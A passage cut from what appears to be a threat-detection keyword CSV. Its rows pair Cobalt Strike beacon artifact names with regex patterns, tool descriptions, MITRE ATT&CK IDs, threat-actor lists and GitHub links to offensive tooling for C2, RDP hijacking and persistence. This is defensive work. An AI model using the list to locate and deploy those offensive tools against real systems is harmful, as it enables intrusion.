Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","35664" "*beacon_funcs.c*",".{0,1000}beacon_funcs\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","35665" "*beacon_funcs.h*",".{0,1000}beacon_funcs\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","35666" "*beacon_funcs.x64.*",".{0,1000}beacon_funcs\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - 
BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","35667" "*beacon_funcs.x86.*",".{0,1000}beacon_funcs\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","35668" "*beacon_generate.py*",".{0,1000}beacon_generate\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a 
quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","35669" "*beacon_generate.py*",".{0,1000}beacon_generate\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral 
Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","35670" "*Beacon_GETPOST*",".{0,1000}Beacon_GETPOST.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35671" "*beacon_host_script*",".{0,1000}beacon_host_script.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python 
API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35672" "*beacon_host_script*",".{0,1000}beacon_host_script.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","35673" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 
- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35674" "*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","35675" "*beacon_keys -compile geacon_sourcecode_folder*",".{0,1000}beacon_keys\s\-compile\sgeacon_sourcecode_folder.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35676" "*beacon_log_clean*",".{0,1000}beacon_log_clean.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","35677" "*beacon_output_ps.cna*",".{0,1000}beacon_output_ps\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","35678" "*beacon_print*",".{0,1000}beacon_print.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","35679" "*BEACON_RDLL_*",".{0,1000}BEACON_RDLL_.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35680" "*beacon_remote_exec_*",".{0,1000}beacon_remote_exec_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - 
